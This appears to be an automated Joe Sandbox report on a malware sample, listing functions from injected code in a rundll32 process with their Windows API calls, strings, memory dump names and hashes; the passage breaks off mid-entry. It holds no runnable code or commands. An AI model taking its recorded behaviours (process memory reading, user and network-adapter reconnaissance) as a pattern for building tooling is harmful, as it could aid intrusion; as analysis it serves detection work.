Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00590D30
std::_Lockit::~_Lockit.LIBCPMT ref: 00590D8B

Strings

2Z, xrefs: 00590D55, 00590D6F

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: 2Z
API String ID: 593203224-2484645983
Opcode ID: 625f8d94fe5da8aa5abe56e24421276597f1bacf78fc3f122b39f783c96c6791
Instruction ID: 7f8a53833498cf9a96b6c399884d65e292f6fa17c15514da48a4cc3bb30b383c
Opcode Fuzzy Hash: 625f8d94fe5da8aa5abe56e24421276597f1bacf78fc3f122b39f783c96c6791
Instruction Fuzzy Hash: FA014C35600609AFCF15DB59C855EADBFB9FF88760B184099E8059B3A1DB70EE41CA90

Uniqueness

Uniqueness Score: -1.00%

Function 005B776F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 005B77AF

Strings

InitializeCriticalSectionEx, xrefs: 005B777F
2Z, xrefs: 005B779F

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: 2Z$InitializeCriticalSectionEx
API String ID: 2593887523-4016751400
Opcode ID: c001e847af491e340233337e31b9293c83f889cd3173ae5d0c419817c8a66a72
Instruction ID: 731cae648fbc557e76d712929c3ebef629ad9a325a6ab522b7b6313e02ffe114
Opcode Fuzzy Hash: c001e847af491e340233337e31b9293c83f889cd3173ae5d0c419817c8a66a72
Instruction Fuzzy Hash: A6E0923618421DBFDB111FA1DC0AECD7F25FB88761F004410FD0865160DB719821EAD0

Uniqueness

Uniqueness Score: -1.00%

Function 005B7559 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 005B758D

Strings

2Z, xrefs: 005B7583
FlsAlloc, xrefs: 005B7569

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Alloc
String ID: 2Z$FlsAlloc
API String ID: 2773662609-3723347941
Opcode ID: 9ac13220730a9d0ca15cd8b1dcaf761bc1a263df3dd4f58852e67a2cf33aeedb
Instruction ID: d4ace9094a43de6cbdcacd1dd3a21b3c2929c2a132de09ba4daed10b09453ab4
Opcode Fuzzy Hash: 9ac13220730a9d0ca15cd8b1dcaf761bc1a263df3dd4f58852e67a2cf33aeedb
Instruction Fuzzy Hash: 2AE0C23268872CBFD72027A19C0AFDD7D54FFDCB61B040020FD06191909BA25851AAD2

Uniqueness

Uniqueness Score: -1.00%

Function 005B7915 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(005DE428), ref: 005B7932

Strings

x], xrefs: 005B793E
(], xrefs: 005B7921

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: FreeLibrary
String ID: (]$x]
API String ID: 3664257935-1479357470
Opcode ID: 6bbfaac44a0c431c68e8770bede37652c954ea6649d08f3d68b9192378896ece
Instruction ID: 4808d98994dcbb9ac666e0c85c78b53532d765a525b8f35001b4092ef19a5314
Opcode Fuzzy Hash: 6bbfaac44a0c431c68e8770bede37652c954ea6649d08f3d68b9192378896ece
Instruction Fuzzy Hash: 92E08632C0861D9BEF312E0CD404BE47ED4B7A8332F15012BD4DD5559092712CD1C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 00584070 Relevance: 5.2, APIs: 4, Instructions: 189memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,00584261,005C4400,000000FF,F302A5AA,00000000,?,00000000,?,?,?,005C4400,000000FF,?,00583A75,?), ref: 00584096
LocalAlloc.KERNEL32(00000040,40000022,F302A5AA,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00584154
LocalAlloc.KERNEL32(00000040,3FFFFFFF,F302A5AA,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00584177
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00584217

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: af5304746bb7a6b5d37d3e8cfc9eda62ec754c77892bd63c7871b7aaa1b6340f
Instruction ID: 1a43f2f3e53f06ae557613fb8694ddc2f2d3cdc9d19ebf04b50f1b9a73e1eea8
Opcode Fuzzy Hash: af5304746bb7a6b5d37d3e8cfc9eda62ec754c77892bd63c7871b7aaa1b6340f
Instruction Fuzzy Hash: 57517175A042069FDB18EF68C989AAEBFB5FB48350F14462DED25E7280D731A944CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00581D80 Relevance: 5.2, APIs: 4, Instructions: 171memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,80000022,00000000,?,00000000), ref: 00581E01
LocalAlloc.KERNEL32(00000040,7FFFFFFF,00000000,?,00000000), ref: 00581E21
LocalFree.KERNEL32(7FFFFFFE,?,00000000), ref: 00581EA7
LocalFree.KERNEL32(00000001,F302A5AA,00000000,00000000,005C3C40,000000FF,?,00000000), ref: 00581F2D

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Local$AllocFree
String ID:
API String ID: 2012307162-0
Opcode ID: c13c36bfb6e090700b00142981fd66d1b2f579006e9688fd3cf4f43d73884c9a
Instruction ID: 32d524fc03807d5244b761c8ffaa20ee422cda833f86eb3b621e391cfa96b74b
Opcode Fuzzy Hash: c13c36bfb6e090700b00142981fd66d1b2f579006e9688fd3cf4f43d73884c9a
Instruction Fuzzy Hash: 9F51F2726046159FC314EF28D844A6ABFECFB89350F100A2EFC56E7290DB70E905CB95

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 7768, Parent PID: 7752COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	98.2%
Signature Coverage:	24.8%
Total number of Nodes:	383
Total number of Limit Nodes:	10

Executed Functions

Function 00000235B5CE463C Relevance: 15.3, APIs: 10, Instructions: 291
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00000235B5CE4666
GetCurrentProcessId.KERNEL32 ref: 00000235B5CE4673

Part of subcall function 00000235B5CE8AE0: GetUserNameA.ADVAPI32 ref: 00000235B5CE8B08
Part of subcall function 00000235B5CE8AE0: wsprintfA.USER32 ref: 00000235B5CE8B25

GetCurrentProcessId.KERNEL32 ref: 00000235B5CE4743
GetCurrentProcessId.KERNEL32 ref: 00000235B5CE478D
OpenProcess.KERNEL32 ref: 00000235B5CE479D
NtQueryInformationProcess.NTDLL ref: 00000235B5CE4800
ReadProcessMemory.KERNEL32 ref: 00000235B5CE4873
ReadProcessMemory.KERNEL32 ref: 00000235B5CE48CD

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

WideCharToMultiByte.KERNEL32 ref: 00000235B5CE4946
CloseHandle.KERNEL32 ref: 00000235B5CE4B2C

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Process$CurrentMemory$HandleRead$AllocateByteCharCloseInformationModuleMultiNameOpenQueryUserVirtualWidewsprintf
String ID:
API String ID: 3997021431-0
Opcode ID: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
Instruction ID: c1629b62bce4f1ea243a208e9d9b62a37eb2ac1842c11e0e482459ddfb51026b
Opcode Fuzzy Hash: 4fcbf81e38295e8c30bf4c4e02621455fce0c4a51cb942f1f600040aacfb28cd
Instruction Fuzzy Hash: 46F10932249F9085E7A8DB15E48839AF7A3F384748F500925E68D87AADDF7CD64DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE7588 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitUnicodeString.NTDLL ref: 00000235B5CE75E3

Part of subcall function 00000235B5CE7414: GetFileAttributesW.KERNEL32 ref: 00000235B5CE7428

NtCreateFile.NTDLL ref: 00000235B5CE7662
NtClose.NTDLL ref: 00000235B5CE7680

Strings

0, xrefs: 00000235B5CE75CB
@, xrefs: 00000235B5CE75C0

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: File$AttributesCloseCreateInitStringUnicode
String ID: 0$@
API String ID: 2504508917-1545510068
Opcode ID: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
Instruction ID: e753918e437f81e98247d4f10c1a3d69c7db510d3d08ff3844fd29f77ee77a55
Opcode Fuzzy Hash: 76083a2609edba1498485c59019560715fe1d99402632d84a6ddf28b8a5ccd31
Instruction Fuzzy Hash: 4021C072119B908AE7609F10E45838BBBA6F3C0748F504525E68E87AADCBBDD64DCF40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE77B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitUnicodeString.NTDLL ref: 00000235B5CE781B
NtCreateFile.NTDLL ref: 00000235B5CE7898

Strings

0, xrefs: 00000235B5CE7803
@, xrefs: 00000235B5CE782E

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFileInitStringUnicode
String ID: 0$@
API String ID: 2498367268-1545510068
Opcode ID: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
Instruction ID: 15acb30ecc9e6d798b45c8c4338fd2df9bd9d90f651aa075b1aa524452e244c7
Opcode Fuzzy Hash: 04c235c605806e9dc8f2c28b84d8f7d6f4de585734f90aa2da62749025ce9b27
Instruction Fuzzy Hash: 1221BE72508BD08AE760CF14F45878BBBA1F3C4358F908619E2D987AA8CB7DD599CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE68E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetAdaptersInfo.IPHLPAPI ref: 00000235B5CE6910

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

GetAdaptersInfo.IPHLPAPI ref: 00000235B5CE693B

Strings

o, xrefs: 00000235B5CE691A

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2718687846-252678980
Opcode ID: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
Instruction ID: 4cc3d87e46b9c120b843c538c2a24b646aee6302869ee9f55255802a698f97a2
Opcode Fuzzy Hash: 962fc864ad44ea50d102d36a4ef51c309c81b64051b49607d5a3645f8981529f
Instruction Fuzzy Hash: CA111572508B5086D7749B10F04831AF7A2F3887ACF440625E6CD4AB68DB7CC789CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CEB0C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtOpenKey.NTDLL ref: 00000235B5CEB136

Strings

@, xrefs: 00000235B5CEB110
0, xrefs: 00000235B5CEB108

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Open
String ID: 0$@
API String ID: 71445658-1545510068
Opcode ID: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
Instruction ID: 4accaaf7ad2f34787e875e12fcaf0d6bc6136e97d391e65c42e3f20e8cea3595
Opcode Fuzzy Hash: 795e13a4c90058da1f1586ebf72c997efb6f13dca80179e68242aeb83b732573
Instruction Fuzzy Hash: 0D012CB2218AD086D760DB10E84439BFBA6F384388F904525E68E82A6DDB7CC659CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE8AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00000235B5CE8B08
wsprintfA.USER32 ref: 00000235B5CE8B25

Strings

jones, xrefs: 00000235B5CE8B1E, 00000235B5CE8B2B

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: NameUserwsprintf
String ID: jones
API String ID: 54179028-3844744938
Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
Instruction ID: 286e379e30fa840454579823ae65c3058802180b2acbbbf8d7fc3d0cf91dd4d7
Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
Instruction Fuzzy Hash: ECF0C071224E9292EB95AB10FC493A9A363F790B4CFC01425B18E5659DDF7CC71EDB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CEB1D4 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
Instruction ID: 8389e6bb024e165b349aeeb8d5fb268458c2aa15c20767db2aa9c030d6286004
Opcode Fuzzy Hash: 9a33609b2a6856a8619b29129fe63f4e792fb1ba5e95133a34c5626e82038bfd
Instruction Fuzzy Hash: 9F411932219A9086D794CB15E48975EB7A2F7C4788F505421FB8E83B6DDF7CDA48CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CEA350 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
Opcode ID: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
Instruction ID: fc2a344772b6f9f59b1607e1a8bc9001b3e9b8ec239f62335237a146ff787830
Opcode Fuzzy Hash: f5b8e15e2d5f741c678a4cffa39018f89b7dc81c4aebc7bfbd20095086e1a026
Instruction Fuzzy Hash: 4F31E022158E91CAEA749B10E84C35AE363F7D4758F505A35A69E42AEDDF3CD648CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CEAD34 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

Strings

@, xrefs: 00000235B5CEAD46

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
Instruction ID: 3bb5e97d521b17aab5bfc6c2fb2940613cc1433117db131bc690b2a37bb9df3d
Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
Instruction Fuzzy Hash: E3E01C62228A9086D6409F14E45874AB761F7847B8F401301BAAD46AD8CB7CC2188B00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE78C0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00000235B5CEAD34: NtAllocateVirtualMemory.NTDLL ref: 00000235B5CEAD6A

NtReadFile.NTDLL ref: 00000235B5CE799F

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateFileMemoryReadVirtual
String ID:
API String ID: 1637922817-0
Opcode ID: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
Instruction ID: 3cf675bda28ab9c5ac5610e6234d29f9a66236ee38d7b8a0e2b7de8c8b974c95
Opcode Fuzzy Hash: 36657efa21e47acabbe304ce370d7eda266725ffc383b0fc2da5649518910504
Instruction Fuzzy Hash: D921D632218BC48AD764CB65E45434AF7E6F388794F908425EB8D83B68EFBCC558CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE79C8 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFileInitStringUnicode
String ID:
API String ID: 2498367268-0
Opcode ID: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
Instruction ID: 87817c5b06f95e78536931b7f4dc8cfc27dd27dd92661bcea93c34b3e061d495
Opcode Fuzzy Hash: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
Instruction Fuzzy Hash: 1201E932248A90C2D634DB15E44520ABBF2F39878CF601525FA8C47A5DDB7DDB598F00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE378C Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 00000235B5CE37F6

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
Instruction ID: 2351d831a97ed610b36cc17a6037107364fc2d096cb487fc399a3e575e0a3909
Opcode Fuzzy Hash: d9304d9f457485473b7900aa6a25bb2e7ca8446cd6fe457b90ec29283a0f1812
Instruction Fuzzy Hash: A1F04F71268A5085E7709B10E44874AB762F7847BCF500724F6AD46ADDCB7DE3488B00

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE7A54 Relevance: 1.5, APIs: 1, Instructions: 25filenativeCOMMON

Download Yara Rule

APIs

NtWriteFile.NTDLL ref: 00000235B5CE7AAB

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
Instruction ID: 1e92dd3779b385486744bce3803aec7a2f0644783e4e3c4ea660fe0a0f763f85
Opcode Fuzzy Hash: 13d6e9b28a46ed7aa7967ced570f62f239b9eb5f972fb27ff2d7d829580b4ea2
Instruction Fuzzy Hash: 94F0E232618BD086D360CB64F48574BF7A1F384798F605525E6C982F28DBBCC2988F40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE7B40 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtFreeVirtualMemory.NTDLL ref: 00000235B5CE7B71

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeMemoryVirtual
String ID:
API String ID: 3963845541-0
Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
Instruction ID: f9b333dca5c858961a9780fcc788ab3f0b9e2090d7d4c93c48d1e347cd508409
Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
Instruction Fuzzy Hash: 42E0E671504F8181D7609B50E444749B771F385778F944315E6B951AE8CF7CC25DCF00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070044 Relevance: 12.2, APIs: 2, Strings: 6, Instructions: 179
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000000180070201
VirtualAlloc.KERNELBASE ref: 0000000180070272

Strings

&$58, xrefs: 0000000180070248
MhGL, xrefs: 0000000180070079
t!, xrefs: 0000000180070089
o0+X, xrefs: 0000000180070081
KYZi, xrefs: 0000000180070071
k, xrefs: 0000000180070099

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: &$58$KYZi$MhGL$k$o0+X$t!
API String ID: 4275171209-455283310
Opcode ID: 1d3f5de679e9be7a7fe53fc895b5663e74619cb245d1804fb0228fdac3198365
Instruction ID: 0e931260a18899616fd0cd13b7456a36469c7a130b0b511a481734c725122d66
Opcode Fuzzy Hash: 1d3f5de679e9be7a7fe53fc895b5663e74619cb245d1804fb0228fdac3198365
Instruction Fuzzy Hash: 9E712272701788C6EB6ACF25E044B9E7BB1F348BC8FA59115EE4927B55DA3EC609C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE33AC Relevance: 9.2, APIs: 6, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
Instruction ID: bec71b98e8bdd58b095a654aa3556370356a75b679528775027c6b0d50a7541c
Opcode Fuzzy Hash: 06ad649505e65272b345abbef3c927157fd5b2a45000902e8d273f2bd39a749f
Instruction Fuzzy Hash: 3E915032255F9495EA64DB10F44839AF3A3F780788F901825E68E436ADEF7CE64DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE3A24 Relevance: 9.1, APIs: 6, Instructions: 110
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32 ref: 00000235B5CE3A6D

Memory Dump Source

Source File: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000235B5CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_235b5ce0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
Instruction ID: 32f34279e22e4645eded1a3bc8fa1c00c7a7a17b2a9085ad0984dd56567a53da
Opcode Fuzzy Hash: 28f683417bb40a7b537b498f59f6f3678ae65d175f6e6e2096980ada4a5882a7
Instruction Fuzzy Hash: A0512E31208F9082E7549B14F45835AF7A2F785BA8F200625EA9D47BECDF7CE589CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00000235B5CE3868 Relevance: 7.6, APIs: 5, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

